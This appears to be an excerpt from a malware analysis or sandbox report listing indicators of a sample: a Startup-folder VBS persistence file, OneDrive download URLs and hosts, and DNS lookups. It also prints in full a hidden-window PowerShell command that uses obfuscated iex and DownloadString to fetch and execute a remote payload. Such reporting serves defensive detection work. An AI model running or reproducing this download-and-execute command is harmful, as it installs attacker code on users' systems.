Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\home.vbs
- https://onedrive.live.com/download?cid=5d3be849d403295c&resid=5d3be849d403295c%21260&authkey=af4xbczagd8l974
- 'on####ve.live.com':443
- 'ti####.#m.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK ti####.#m.files.1drv.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''https://onedrive.live.com/download?cid=5D3BE849D403295C&resid=5D3BE849D403295C%21260&authkey=AF4xbCzaGD8l974'')'));[...' (with hidden window)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\home.vbs"